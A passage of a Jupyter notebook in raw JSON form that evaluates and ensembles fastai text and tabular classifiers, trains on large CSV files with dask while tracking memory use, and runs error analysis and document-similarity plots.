319, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362, 363, 364, 365, 366, 367, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 378, 379, 380, 381, 382, 383, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393, 394, 395, 396, 397, 398, 399, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 411, 412, 413, 414, 415, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 426, 427, 428, 429, 430, 431, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 442, 443, 444, 445, 446, 447, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 458, 459, 460, 461, 462, 463, 464, 465, 466, 467, 468, 469, 470, 471, 472, 473, 474, 475, 476, 477, 478, 479, 480, 481, 482, 483, 484, 485, 486, 487, 488, 489, 490, 491, 492, 493, 494, 495, 496, 497, 498, 499]\n" ], [ "# dls.vocab.o2i to acess label names from predictions\n\ndls = multimodal_clf.tab_clf.dls\nlabel_name2num = {k: dls.vocab.o2i[k] for k in list(dls.vocab.o2i)}\nlabel_name2num", "_____no_output_____" ], [ "#get samples of False Positive (df_fp) and False Negative (df_fn)\ny_true=y_test; y_pred=preds0; pos_val=2\nfrom sklearn.metrics import confusion_matrix\ny_test= test_df[label_col].map(label_name2num)\ndf_ = pd.DataFrame(zip(y_true, y_pred), columns=['y_true', 'y_pred'], index=test_df.index)\ndf__=pd.concat([df_, test_df],axis=1)\ndf_FP = df__[df__['y_true']==pos_val and df__['y_pred']!=df__['y_true']]\ndf_FP", "/usr/local/lib/python3.7/dist-packages/ipykernel_launcher.py:7: UserWarning: Boolean Series key will be reindexed to match DataFrame index.\n import sys\n" ], [ "#export\ndef get_performance_scores(y_true, y_prob, y_pred=None, label_name2num=None, normalize:str='all', **kwargs): \n \"\"\"a wrapper to show common performance scores of a ML model\n Args:\n y_true, y_prob, y_pred=None, label_name2num=None, **kwargs\n normalize : {'true', 'pred', 'all'}, 
default=None Normalizes confusion matrix over the true (rows), predicted (columns) conditions or all the population. If None, confusion matrix will not be normalized.\n Returns:\n clf_report, cm_df, macro_roc_auc_ovo, weighted_roc_auc_ovo, macro_roc_auc_ovr, weighted_roc_auc_ovr\n\n \"\"\"\n import seaborn as sns \n from sklearn.metrics import roc_auc_score, classification_report\n if y_pred is None:\n y_pred = y_prob.argmax(axis=1)\n\n # Creating a confusion matrix,which compares the y_test and y_pred\n cm = confusion_matrix(y_test, y_pred, normalize=normalize)\n\n # Creating a dataframe for a array-formatted Confusion matrix,so it will be easy for plotting.\n if label_name2num is not None:\n label_vals = list(label_name2num.keys())\n else:\n label_vals = list(range(y_prob.shape[1]))\n cm_df = pd.DataFrame(cm,\n index = label_vals,# e.g. ['SETOSA','VERSICOLR','VIRGINICA']\n columns =label_vals)\n \n #Plotting the confusion matrix\n plt.figure(figsize=(5,4))\n sns.heatmap(cm_df, cmap=\"YlGnBu\", annot=True)\n plt.title('Confusion Matrix')\n plt.ylabel('Actal Values')\n plt.xlabel('Predicted Values')\n plt.show()\n\n # create classification report\n clf_report = classification_report(y_true, y_pred, **kwargs)\n print(f\"=============classification report===============\\n\")\n print(clf_report)\n # make various kinds of roc_auc\n macro_roc_auc_ovo = roc_auc_score(y_true, y_prob, multi_class=\"ovo\", average=\"macro\")\n\n weighted_roc_auc_ovo = roc_auc_score(\n y_test, y_prob, multi_class=\"ovo\", average=\"weighted\"\n )\n\n macro_roc_auc_ovr = roc_auc_score(y_true, y_prob, multi_class=\"ovr\", average=\"macro\")\n\n weighted_roc_auc_ovr = roc_auc_score(\n y_true, y_prob, multi_class=\"ovr\", average=\"weighted\"\n )\n print(\n \"One-vs-One ROC AUC scores:\\n{:.6f} (macro),\\n{:.6f} \"\n \"(weighted by prevalence)\".format(macro_roc_auc_ovo, weighted_roc_auc_ovo)\n )\n print(\n \"One-vs-Rest ROC AUC scores:\\n{:.6f} (macro),\\n{:.6f} \"\n \"(weighted by 
prevalence)\".format(macro_roc_auc_ovr, weighted_roc_auc_ovr)\n )\n return clf_report, cm_df, macro_roc_auc_ovo, weighted_roc_auc_ovo, macro_roc_auc_ovr, weighted_roc_auc_ovr\n\nprint('============ ensembled method using embs (\"middle concat\")============\\n')\n_ = get_performance_scores(y_true=y_test, y_prob=probs0, label_name2num= label_name2num)\nprint('============ ensembled method using probs (\"late concat\")============\\n')\n_ = get_performance_scores(y_true=y_test, y_prob=probs1, label_name2num= label_name2num)", "============ ensembled method using embs (\"middle concat\")============\n\n" ] ], [ [ "# 6) Bigdata ML\n\n", "_____no_output_____" ], [ "ref:https://gdmarmerola.github.io/big-data-ml-training/\n\n", "_____no_output_____" ], [ "## bigdata ML solu1: ensemble learning", "_____no_output_____" ] ], [ [ "!python -m pip install \"dask[dataframe]\"\n!pip install 'fsspec>=0.3.3'", "Requirement already satisfied: dask[dataframe] in /usr/local/lib/python3.7/dist-packages (2.12.0)\nCollecting fsspec>=0.6.0\n Downloading fsspec-2022.3.0-py3-none-any.whl (136 kB)\n\u001b[K |████████████████████████████████| 136 kB 10.1 MB/s \n\u001b[?25hCollecting partd>=0.3.10\n Downloading partd-1.2.0-py3-none-any.whl (19 kB)\nRequirement already satisfied: numpy>=1.13.0 in /usr/local/lib/python3.7/dist-packages (from dask[dataframe]) (1.21.5)\nRequirement already satisfied: toolz>=0.7.3 in /usr/local/lib/python3.7/dist-packages (from dask[dataframe]) (0.11.2)\nRequirement already satisfied: pandas>=0.23.0 in /usr/local/lib/python3.7/dist-packages (from dask[dataframe]) (1.3.5)\nRequirement already satisfied: python-dateutil>=2.7.3 in /usr/local/lib/python3.7/dist-packages (from pandas>=0.23.0->dask[dataframe]) (2.8.2)\nRequirement already satisfied: pytz>=2017.3 in /usr/local/lib/python3.7/dist-packages (from pandas>=0.23.0->dask[dataframe]) (2018.9)\nCollecting locket\n Downloading locket-0.2.1-py2.py3-none-any.whl (4.1 kB)\nRequirement already satisfied: six>=1.5 in 
/usr/local/lib/python3.7/dist-packages (from python-dateutil>=2.7.3->pandas>=0.23.0->dask[dataframe]) (1.15.0)\nInstalling collected packages: locket, partd, fsspec\nSuccessfully installed fsspec-2022.3.0 locket-0.2.1 partd-1.2.0\nRequirement already satisfied: fsspec>=0.3.3 in /usr/local/lib/python3.7/dist-packages (2022.3.0)\n" ], [ "# libs to help us track memory via sampling\nimport numpy as np\nimport tracemalloc\nfrom time import sleep\nimport matplotlib.pyplot as plt\n\n# sampling time in seconds\nSAMPLING_TIME = 0.001\n\nclass MemoryMonitor:\n def __init__(self, close=True):\n \n # start tracemalloc and sets\n # measurement atribute to True\n tracemalloc.start()\n self.keep_measuring = True\n self.close = close\n \n def measure_usage(self):\n \n \"\"\"\n Takes measurements of used memory on\n regular intevals determined by the \n global SAMPLING_TIME constant\n \"\"\"\n \n # list to store memory usage samples\n usage_list = []\n \n # keeps going until someone changes this parameter to false\n while self.keep_measuring:\n \n # takes a sample, stores it in the usage_list and sleeps\n current, peak = tracemalloc.get_traced_memory()\n usage_list.append(current/1e6)\n sleep(SAMPLING_TIME)\n \n # stop tracemalloc and returns list\n if self.close:\n tracemalloc.stop()\n return usage_list\n\n# imports executor\nfrom concurrent.futures import ThreadPoolExecutor\nfrom functools import wraps\n\ndef plot_memory_use(history, fn_name, open_figure=True, offset=0, **kwargs):\n \n \"\"\"Function to plot memory use from a history collected\n by the MemoryMonitor class\n \"\"\"\n\n # getting times from counts and sampling time\n times = (offset + np.arange(len(history))) * SAMPLING_TIME\n \n # opening figure and plotting\n if open_figure:\n plt.figure(figsize=(10,3), dpi=120)\n plt.plot(times, history, 'k--', linewidth=1)\n plt.fill_between(times, history, alpha=0.5, **kwargs)\n \n # axes titles\n plt.ylabel('Memory usage [MB]')\n plt.xlabel('Time [seconds]')\n 
plt.title(f'{fn_name} memory usage over time')\n \n # legend\n plt.legend();\n\ndef track_memory_use(plot=True, close=True, return_history=False):\n \n def meta_wrapper(fn):\n \n \"\"\"\n This function is meant to be used as a decorator\n that informs wrapped function memory usage\n \"\"\"\n \n # decorator so we can retrieve original fn\n @wraps(fn)\n def wrapper(*args, **kwargs):\n\n \"\"\"\n Starts wrapped function and holds a process \n to sample memory usage while executing it\n \"\"\"\n\n # context manager for executor\n with ThreadPoolExecutor() as executor:\n\n # start memory monitor\n monitor = MemoryMonitor(close=close)\n mem_thread = executor.submit(monitor.measure_usage)\n\n # start wrapped function and get its result\n try:\n fn_thread = executor.submit(fn, *args, **kwargs)\n fn_result = fn_thread.result()\n\n # when wrapped function ends, stop measuring\n finally:\n monitor.keep_measuring = False\n history = mem_thread.result()\n\n # inform results via prints and plot\n print(f'Current memory usage: {history[-1]:2f}')\n print(f'Peak memory usage: {max(history):2f}')\n if plot:\n plot_memory_use(history, fn.__name__)\n if return_history:\n return fn_result, history\n else:\n return fn_result\n\n return wrapper\n \n return meta_wrapper", "_____no_output_____" ], [ "# to visualize memory use ref:https://gdmarmerola.github.io/big-data-ml-training/\n# track_memory_use will be used as a decorator\n#from nbdev_colab.track_memory import track_memory_use, plot_memory_use\nimport dask.dataframe as dd", "_____no_output_____" ], [ "class EnsembleWrapper:\n \"\"\"\n create an ensembled model of a list of models.\n \"\"\"\n \n def __init__(self, model_list):\n self.model_list = model_list\n def predict_proba(self, X):\n probs_list = [mdl.predict_proba(X) for mdl in self.model_list]\n return np.array(probs_list).mean(axis=0)\n\n# all label values\nlabel_vals = list(df[label_col].value_counts().keys())\n\ndef dask_read_and_sample(blocksize:int=10**6, 
sample_size:int=1e3, label_vals=label_vals):\n \n # reading train data\n print(f'================== dask reads train_df.csv===================')\n\n # reading train & test with dask data_file = 'train_df.csv'\n train_dd = dd.read_csv(data_path+'train_df.csv', \n engine='python',\n encoding='utf-8', # 'utf-8-sig', #\n error_bad_lines=False,\n blocksize=blocksize,\n assume_missing=True,\n ) \n print(f'================== dask reads test_df.csv===================')\n\n test_dd = dd.read_csv(data_path+'test_df.csv', \n engine='python',\n encoding='utf-8', # 'utf-8-sig', #\n error_bad_lines=False,\n blocksize=blocksize,\n assume_missing=True\n )\n # let us stratify to get the same number of rows for frauds and non-frauds\n sample_ls = [train_dd.query(f'{label_col} == {label_val}').sample(frac=sample_size) for label_val in label_vals]\n #sample_positive = train_dd.query(f'{label_col} == 1').sample(frac=sample_size)\n #sample_negative = train_dd.query(f'{label_col} == 0').sample(frac=sample_size)\n \n # concatenate the dataframe\n df_sampled = dd.concat(sample_ls)\n \n return df_sampled.compute(scheduler='synchronous')\n\n\n@track_memory_use(close=True, return_history=True)\ndef dask_read_test_and_score(model, blocksize):\n \n # reading test\n df_test = dd.read_csv(data_path+'test_df.csv', blocksize=blocksize)\n\n # splitting design matrix and target\n X_test = df_test.drop(label_col, axis=1)\n y_test = df_test[label_col].persist(scheduler='synchronous')\n \n # scoring and printing result\n y_prob = X_test.map_partitions(model.predict_proba).compute(scheduler='synchronous')\n\n from sklearn.metrics import roc_auc_score\n macro_roc_auc_ovo = roc_auc_score(y_test, y_prob, multi_class=\"ovo\", average=\"macro\")\n \n weighted_roc_auc_ovo = roc_auc_score(\n y_test, y_prob, multi_class=\"ovo\", average=\"weighted\"\n )\n \n macro_roc_auc_ovr = roc_auc_score(y_test, y_prob, multi_class=\"ovr\", average=\"macro\")\n \n weighted_roc_auc_ovr = roc_auc_score(\n y_test, y_prob, 
multi_class=\"ovr\", average=\"weighted\"\n )\n print(\n \"One-vs-One ROC AUC scores:\\n{:.6f} (macro),\\n{:.6f} \"\n \"(weighted by prevalence)\".format(macro_roc_auc_ovo, weighted_roc_auc_ovo)\n )\n print(\n \"One-vs-Rest ROC AUC scores:\\n{:.6f} (macro),\\n{:.6f} \"\n \"(weighted by prevalence)\".format(macro_roc_auc_ovr, weighted_roc_auc_ovr)\n )\n \n#example: _, mem_history_3 = dask_read_test_and_score(model, blocksize=5e6)\n\n\n# using a function so we can track memory usage\n@track_memory_use(close=False, return_history=True)\ndef dask_read_sample_and_fit_model(blocksize, sample_size, n_models):\n \n # init model list\n model_list = []\n \n # loop for each model\n for _ in range(n_models):\n \n # reading train data\n df_train = dask_read_and_sample.__wrapped__(blocksize, sample_size)\n\n # fitting model\n model_list.append(fit_model.__wrapped__(df_train))\n \n return EnsembleWrapper(model_list)\n \n# executing\nmodel, mem_history_1 = dask_read_sample_and_fit_model(blocksize=10e6, sample_size=0.05, n_models=10)\n_, mem_history_2 = dask_read_test_and_score(model, blocksize=5e6)", "_____no_output_____" ], [ "\nmultimodal_clf = Fastai_Multimodal_Classifier()\nmultimodal_clf.fit(df=train_df, label_col=label_col, cnt_cols=cnt_cols, cat_cols=cat_cols,txt_cols=txt_cols,img_cols=img_cols)\n(preds0, preds1), (probs0, probs1) = multimodal_clf.get_preds(test_df)\n(preds0, preds1), (probs0, probs1)", "_____no_output_____" ], [ "", "_____no_output_____" ] ], [ [ "## bigdata ML solu2: incremental learning\n\n", "_____no_output_____" ] ], [ [ "import tensorflow as tf\nfrom tensorflow.keras import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout\ntf.keras.backend.set_floatx('float64')\n\nclass KerasWrapper:\n def __init__(self, model, feat_mean, feat_std):\n self.model = model\n self.feat_mean = feat_mean\n self.feat_std = feat_std\n \n def predict_proba(self, X):\n \n preds = self.model.predict((X - self.feat_mean)/self.feat_std)\n return np.c_[preds, preds]\n 
\n# using a function so we can track memory usage\n@track_memory_use(close=False, return_history=True)\ndef dask_read_and_incrementally_fit_keras(blocksize):\n print(f'================== dask reads train_df.csv===================')\n\n # reading train & test with dask data_file = 'train_df.csv'\n train_dd = dd.read_csv(data_path+'train_df.csv', \n engine='python',\n encoding='utf-8', # 'utf-8-sig', #\n error_bad_lines=False,\n blocksize=blocksize,\n assume_missing=True,\n ) \n print(f'================== dask reads test_df.csv===================')\n\n test_dd = dd.read_csv(data_path+'test_df.csv', \n engine='python',\n encoding='utf-8', # 'utf-8-sig', #\n error_bad_lines=False,\n blocksize=blocksize,\n assume_missing=True\n )\n # reading df with dask***********************************\n df_train = dd.read_csv(data_path+'train_df.csv', blocksize=blocksize)\n \n # creating keras model\n model = Sequential([Dense(16, activation='relu'),\n Dropout(0.25),\n Dense(16, activation='relu'),\n Dropout(0.25),\n Dense(16, activation='relu'),\n Dropout(0.25),\n Dense(1, activation='sigmoid')])\n model.compile(loss='binary_crossentropy')\n \n # getting mean and std for dataset to normalize features\n feat_mean = df_train.drop(label_col, axis=1).mean().compute(scheduler='synchronous')\n feat_std = df_train.drop(label_col, axis=1).std().compute(scheduler='synchronous')\n \n # loop for number of partitions\n for i in range(df_train.npartitions):\n \n # getting one partition\n part = df_train.get_partition(i).compute(scheduler='synchronous')\n \n # splitting\n X_part = (part.drop('isFraud', axis=1) - feat_mean)/feat_std\n y_part = part['isFraud']\n \n # running partial fit\n model.fit(X_part, y_part, batch_size=512)\n \n return KerasWrapper(model, feat_mean, feat_std)\n\nmodel, mem_history_1 = dask_read_and_incrementally_fit_keras(blocksize=5e6)", "_____no_output_____" ], [ "", "_____no_output_____" ], [ "", "_____no_output_____" ], [ "", "_____no_output_____" ] ], [ [ "# 7) Extra & 
Experimental\n", "_____no_output_____" ], [ "## experiment: create ensemble classifier using individual classifiers' various output\n\nI can extract various info from each individual classifier, including\n\n- probs (highest level features)\n- embeddings (intermediate level features)\n- encoding of txt_cols, img_cols, cnt_cols, cat_cols (lowest level features)", "_____no_output_____" ] ], [ [ "# load lm and clf based on 'skills' column\nlm0, clf0 = load_fastai_text_classifier(df, \n txt_col=txt_cols[0],\n label_col=label_col,\n model_path='/content/drive/My Drive/fastai_multimodal/model/',\n flag_auto_lr=False\n )\n\n# load lm and clf based on 'title' column\nlm1, clf1 = load_fastai_text_classifier(df, \n txt_col=txt_cols[1],\n label_col=label_col,\n model_path='/content/drive/My Drive/fastai_multimodal/model/',\n flag_auto_lr=False\n )\n", "_____no_output_____" ], [ "# get df[txt_cols[0]] embeddings_df e1 \ne1 = get_fastai_docs_embs(docs=df[txt_cols[0]], learn=clf0, lm=lm0, df=None, txt_col=None)\n# get df[txt_cols[1]] embeddings_df e2\ne2 = get_fastai_docs_embs(docs=df[txt_cols[1]], learn=clf1, lm=lm1, df=None, txt_col=None)\n\n#construct a embedings ls\nembs_ls = [e1, e2]", "_____no_output_____" ], [ "embs_ls =[e1, e2]", "_____no_output_____" ], [ "#pickle embs_ls\nimport pickle\nwith open(\"embs_ls.pickle\",\"wb\") as f:\n pickle.dump(embs_ls,f)\n", "_____no_output_____" ], [ "# get prediction on labels and probabilities\npreds0, prods0 = fastai_learner_preds(learner=clf0, test_df=df, label_col=label_col, txt_col=txt_cols[0])\npreds1, prods1 = fastai_learner_preds(learner=clf1, test_df=df, label_col=label_col, txt_col=txt_cols[1])", "_____no_output_____" ], [ "#pickle probs_ls\nprobs_ls = [prods0.numpy(), prods1.numpy()]\nwith open(\"probs_ls.pickle\",\"wb\") as f:\n pickle.dump(probs_ls,f)", "_____no_output_____" ] ], [ [ "## module: Visualize doc similarity\n\n", "_____no_output_____" ] ], [ [ "#export\n\"\"\"\nimport pandas as pd\nimport re\nimport seaborn 
as sns\nimport tensorflow as tf\n\"\"\"\ndef normalize(data):\n return (data - np.min(data)) / (np.max(data) - np.min(data))\n## permutation test\ndef perm_test(x1, x2):\n \"\"\"return the p-value of similarity bw x1 and x2\"\"\"\n import math, random\n from scipy import stats\n similarity = lambda x1, x2: sum(xj*xk for xj,xk in zip(x1, x2))/math.sqrt(sum(xj**2 for xj in x1)*sum(xk**2 for xk in x2))\n\n lx, sr = len(x1), []\n for j in range(10000):\n mj = random.sample(x1, lx)\n sr.append(similarity(mj, x2))\n shape, loc, scale = stats.weibull_min.fit(sr)\n ## -log10(p)\n ej = ((sr-loc)/scale)**shape*math.log10(math.exp(1.))\n p = 10**(-ej)\n return p\n\ndef plot_similarity(labels, features, rotation, flag_norm_corr=True):\n norm_features = [tf.linalg.normalize(t)[0].numpy() for t in features]\n corr = np.inner(norm_features, norm_features)\n if flag_norm_corr:\n corr = normalize(corr)\n\n sns.set(font_scale=1.2)\n g = sns.heatmap(\n corr,\n xticklabels=labels,\n yticklabels=labels,\n vmin=0,\n vmax=1,\n cmap=\"YlOrRd\")\n g.set_xticklabels(labels, rotation=rotation)\n g.set_title(\"Semantic Textual Similarity\")\n\ndef plot_docs_sim(label_doc_dic, doc_embeddings, flag_norm_corr=True):\n \"\"\"get embedding vectors for docs and plot their similarity\n Args:\n label_doc_dic:dict with label:doc pairs\n doc_embeddings: a list of embedding vectors\n flag_norm_corr: whether or not normalized corr e.g. 
max(X)->1, min(X)->0, x-> x/(max(X)-min(X))\n Return:\n None\n \"\"\"\n \n if isinstance(doc_embeddings, scipy.sparse.csr.csr_matrix):\n doc_embeddings = doc_embeddings.toarray()\n\n plot_similarity(list(label_doc_dic.keys()), doc_embeddings, 90, flag_norm_corr)", "_____no_output_____" ], [ "# load validation data\ndf = pd.read_csv(data_path+'JD_skills_similarity_validation.csv')\n# extract title from job requisition\ndf['Title'] = [re.split('-|,', ' '.join(x.split(' ')[1:]))[0] for x in df['Job Requisition']]\n# concate multiple text cols\ndf['Title_Skills'] = df[['Title','Skills']].agg(', '.join, axis=1)\n# construct a dictionary with key=label, value=skills\nlabel_doc_dic = dict(zip(df['Code'],df['Title_Skills']))\nlabel_doc_dic", "_____no_output_____" ], [ "doc_embeddings = get_fastai_docs_embs(docs=list(label_doc_dic.values()), learn=clf, lm=lm, df=None, txt_col=None)", "_____no_output_____" ], [ "plot_docs_sim(label_doc_dic, doc_embeddings, flag_norm_corr=True)\n", "_____no_output_____" ], [ "x1 = list(doc_embeddings[0])\nx2 = list(doc_embeddings[1])\nperm_test(x1, x2)", "_____no_output_____" ] ], [ [ "## Experiment2: Error analysis\n", "_____no_output_____" ] ], [ [ "# classifier performance by confusion matrix\ninterp = ClassificationInterpretation.from_learner(multimodal_clf)\ninterp.plot_confusion_matrix(figsize=(8,8), dpi=60)", "_____no_output_____" ], [ "interp.print_classification_report()", "_____no_output_____" ], [ "# how to get prediction/inference on validation data? 
https://forums.fast.ai/t/unable-to-get-predictions-on-validation-dataset-v2/79171/2\n\n# get the idxs of validation data\nvalid_idxs = clf0.dls.valid.get_idxs()\n\n# get predictions on validation data\npreds_valid, probs_valid = fastai_learner_preds(learner=clf0, test_df=df.iloc[valid_idxs,], label_col=label_col, txt_col=txt_cols[-1])\npreds_valid, probs_valid", "_____no_output_____" ], [ "df_res = df.iloc[valid_idxs,][[txt_cols[-1], label_col]].copy()\ndf_res['pred'] = preds_valid\ndf_res['prob'] = probs_valid.numpy().max(axis=1)\ndf_res", "_____no_output_____" ], [ "# false positive samples subset idxs in valid_idxs\ndf_fp = df_res[df_res[label_col] == 0][df_res['pred'] == 1][['label', 'pred', 'prob', txt_cols[-1]]]\ndf_fp", "/usr/local/lib/python3.7/dist-packages/ipykernel_launcher.py:2: UserWarning: Boolean Series key will be reindexed to match DataFrame index.\n \n" ], [ "# false negative samples\ndf_fn = df_res[df_res[label_col] == 1][df_res['pred'] == 0][['label', 'pred','prob', txt_cols[-1]]]\ndf_fn", "/usr/local/lib/python3.7/dist-packages/ipykernel_launcher.py:2: UserWarning: Boolean Series key will be reindexed to match DataFrame index.\n \n" ], [ "list(set(df_fn.index ) & set(valid_idxs)), list(set(df_fp.index ) & set(valid_idxs)) ", "_____no_output_____" ] ], [ [ "## module: Error Analysis", "_____no_output_____" ] ], [ [ "#export\ndef get_fastai_classifier_error_analysis(learner, df:pd.DataFrame, label_col:str, txt_col:str=None):\n \"\"\"get the error analysis of a fastai text classifier on its validation dataset\n Args:\n learner:a trained fastai text classifier e.g. clf2\n df:pd.DataFrame the whole dataframe learner was trained on. learner has the info on how to split df into train and valid\n label_col:str e.g. 'label'\n txt_col:str e.g. 
'title_raw+hard_skills_name'\n Ref: https://forums.fast.ai/t/unable-to-get-predictions-on-validation-dataset-v2/79171\n \"\"\"\n # show classifier performance by confusion matrix\n interp = ClassificationInterpretation.from_learner(learner)\n interp.plot_confusion_matrix(figsize=(8,8), dpi=60)\n\n #show classification report\n interp.print_classification_report()\n\n # get the idxs of validation data\n valid_idxs = learner.dls.valid.get_idxs()\n\n # get predictions on validation data\n preds_valid, probs_valid = fastai_learner_preds(learner=learner, test_df=df.iloc[valid_idxs,], label_col=label_col, txt_col=txt_col)\n\n # prep df for result\n df_res = df.iloc[valid_idxs,][[txt_col, label_col]].copy()\n df_res['prediction'] = preds_valid\n df_res['probability'] = probs_valid.numpy().max(axis=1)\n\n\n # false positive samples subset idxs in valid_idxs\n df_fp = df_res[df_res[label_col] == 0][df_res['prediction'] == 1][['label', 'prediction', 'probability', txt_col]]\n\n # false negative samples\n df_fn = df_res[df_res[label_col] == 1][df_res['prediction'] == 0][['label', 'prediction','probability', txt_col]]\n return df_fp, df_fn\n", "_____no_output_____" ], [ "# get false_positives and false_negatives \ndf_fp, df_fn = get_fastai_classifier_error_analysis(learner=clf0, df=df, label_col=label_col, txt_col=txt_cols[-1])\n\ndf_fp", "_____no_output_____" ], [ "df_fn", "_____no_output_____" ] ], [ [ "### experiment\nI need to convert tab_learn1, tab_learn2 as End-to-End classifiers which take raw input and output preds, probs", "_____no_output_____" ] ], [ [ "import pickle\nwith open(\"embs_ls.pickle\",\"wb\") as f:\n pickle.dump(embs_ls,f)\nwith open(\"embs_ls.pickle\",\"rb\") as f:\n embs_ls = pickle.load(f)\n\nwith open(\"probs_ls.pickle\",\"wb\") as f:\n pickle.dump(probs_ls,f)\nwith open(\"probs_ls.pickle\", \"rb\") as f:\n probs_ls = pickle.load(f)", "_____no_output_____" ], [ "#export\ndef split_idxs(df, train_size=.9, flag_random_split=True):\n \"\"\" split df 
index into 2 parts: train_idxs and test_idxs \n Args:\n df: the dataframe of all your data\n train_size (float in [0,1], default 0.9)\n flag_random_split(bool, default False): do you want random split idxs?\n Returns:\n (ls_train, ls_test): a 2-tuple of lists for train indices and test indices\n\n Example:\n df = pd.DataFrame({'c1':list(range(26)), 'c2':list(string.ascii_lowercase)})\n splits = split_idxs(df)\n ...\n # use splits to build TabularPandas taublar object\n to = TabularPandas(df, \n procs=procs,\n cat_names=cat_names,\n cont_names=cont_names,\n y_names=y_names,\n y_block=y_block,\n splits=splits)\n \"\"\"\n import random\n ls = range_of(df)\n print(ls)\n if flag_random_split:\n splits = RandomSplitter()(ls)\n else:\n ls_train = ls[:int(df.shape[0]*train_size)]\n ls_test = ls[int(df.shape[0]*train_size):]\n random.shuffle(ls_train)\n random.shuffle(ls_test)\n splits = (ls_train, ls_test)\n return splits\ndef train_ensembled_classifier_by_fastai_tabular(clfs, lms, df, label_col, txt_cols):\n \"\"\"based on fastai tabular learner, train 2 ensembled text classifiers, including\n 1) doc_embs\n 2) probs\n #TBD 3) ensembled of the above 2\n Args:\n clfs:list of fastai text learners e.g. clfs=[clf0, clf1, clf2]\n lms: list of fastai text language models e.g. lms=[lm0, lm1, lm2]\n df:pd.DataFrame containing txt_cols\n label_col:str e.g. 
'label'\n txt_cols: list of text columns the clfs learned from e.g.txt_cols = ['title_raw', 'hard_skills_name', 'title_raw+hard_skills_name']\n\n Returns: a list of fastai tabular classifiers with \n - tab_clf_embs is the classifier trained with txt_col embeddings\n - tab_clf_probs is the classifier trained with probability predictions by clfs\n [tab_clf_embs, tab_clf_probs] \n \n \"\"\"\n # make sure txt_cols in df is string\n for col in txt_cols:\n df[col].fillna('', inplace=True) # replace NaN by ''\n df[col] = df[col].astype(str) # convert dtype from object to str\n\n # get docs embeddings list\n try:\n import pickle\n with open(\"embs_ls.pickle\",\"rb\") as f:\n embs_ls = pickle.load(f)\n except:\n embs_ls = []\n for (txt_col, clf, lm) in zip(txt_cols, clfs, lms):\n embs = get_fastai_docs_embs(docs=df[txt_col], learn=clf, lm=lm, df=None, txt_col=None)\n embs_ls.append(embs)\n\n #pickle embs_ls\n import pickle\n with open(\"embs_ls.pickle\",\"wb\") as f:\n pickle.dump(embs_ls,f)\n\n\n # train a ensemble classifier using doc embedding\n tab_clf_embs = train_fastai_tabular_classifier_fr_embs_ls(embs_ls, df=df, label_col=label_col) \n\n # get prediction on labels and probabilities\n try:\n with open(\"probs_ls.pickle\", \"rb\") as f:\n probs_ls = pickle.load(f)\n #probs_ls = probs_ls #load_pickled_objs(object_names=['probs_ls'])\n except:\n probs_ls = []\n for (clf, txt_col) in zip(clfs, txt_cols):\n _, probs = fastai_learner_preds(learner=clf, df=df, txt_col=txt_col)\n probs_ls.append(probs.numpy())\n\n #pickle probs_ls\n with open(\"probs_ls.pickle\",\"wb\") as f:\n pickle.dump(probs_ls,f)\n\n # train a ensemble classifier using probs prediction\n tab_clf_probs = train_fastai_tabular_classifier_fr_embs_ls(probs_ls, df=df, label_col=label_col) \n\n return [tab_clf_embs, tab_clf_probs] \n\n\n", "_____no_output_____" ], [ "#dbck\ntab_learn0, tab_learn1 = train_ensembled_classifier_by_fastai_tabular(clfs=[clf0, clf1], lms=[lm0, lm1], txt_cols=txt_cols[:2], df=df, 
label_col=label_col) \n", "_____no_output_____" ] ], [ [ "## module: text classifier for multiple text columns\n\nThe end2end ensemble classifier combines multiple txt_clfs and tab_clfs:\n- inputs: df[txt_cols]\n- outputs: preds, probs\n\ndf[txt_col]=>`txt_clfs`=>emb_ls|probs_ls=>`tab_clfs`=>preds, probs\n\n\n**Why it matters**\n\n- ensemble of multiple txt classifiers combine signal from multiple txt_cols, therefore possibly improve classification performance\n\n- this will be a template for fastai multimodal classification\n - tab_clf =>tab_embs|probs\n - img_clf =>img_embs|probs\n - txt_clf =>txt_embs|probs\nThen end2end ensemble classifier can combine all 3 together.\n", "_____no_output_____" ] ], [ [ "class End2End_Fastai_Texts_Classifier():\n \"\"\"end to end fastai classifier for multiple txt_cols\"\"\"\n def __init__(self,txt_clfs=None, lms=None, tab_clfs=None):\n self.txt_clfs = txt_clfs # a list of fastai text classifiers\n self.lms = lms # a list of fastai text language models\n self.tab_clfs = tab_clfs # a list of fastai tabular classifiers\n \n \n def fit(self, df:pd.DataFrame, label_col:str, txt_cols:list):\n \"\"\"fit multiple fastai text classifiers for each col in txt_cols\n Args:\n df:pd.DataFrame, containing both label_col and txt_cols \n label_col:str, e.g. 'label'\n txt_cols:list, e.g. 
['title_raw',\t'hard_skills_name',\t'title_raw+hard_skills_name']\n Returns:\n None (but update self.txt_clfs, self.lms, self.tab_clfs)\n \"\"\"\n # in case self.txt_clfs = None, make txt_clfs from stratch\n if self.txt_clfs is None:\n txt_clfs = []\n lms = []\n for txt_col in txt_cols:\n lm, txt_clf = train_fastai_text_classifier(df, \n txt_col=txt_col,\n label_col=label_col,\n model_path='/content/drive/My Drive/techskills/model/',\n flag_auto_lr=False\n )\n txt_clfs.append(txt_clf)\n lms.append(lm)\n self.txt_clfs = txt_clfs\n self.lms = lms\n\n # in case self.tab_clfs = None, make tab_clfs from stratch\n if self.tab_clfs is None:\n tab_clfs = train_ensembled_classifier_by_fastai_tabular(self.txt_clfs, self.lms, df, label_col, txt_cols)\n self.tab_clfs = tab_clfs\n\n def get_preds(self, df:pd.DataFrame, txt_cols:list):\n \"\"\"get predictions for test data df[txt_cols]\n Args:\n df:pd.DataFrame, txt_cols:list\n Returns:\n (preds0, preds1), (probs0, probs1), where\n - preds0, probs0: the predictions on test data based on txt_clfs embeddings extraction embs_ls\n - preds1, probs1: the prediction on test data based on txt_clfs output probs_ls\n \n \"\"\"\n # make sure txt_cols in df is string\n for col in txt_cols:\n df[col].fillna('', inplace=True) # replace NaN by ''\n df[col] = df[col].astype(str) # convert dtype 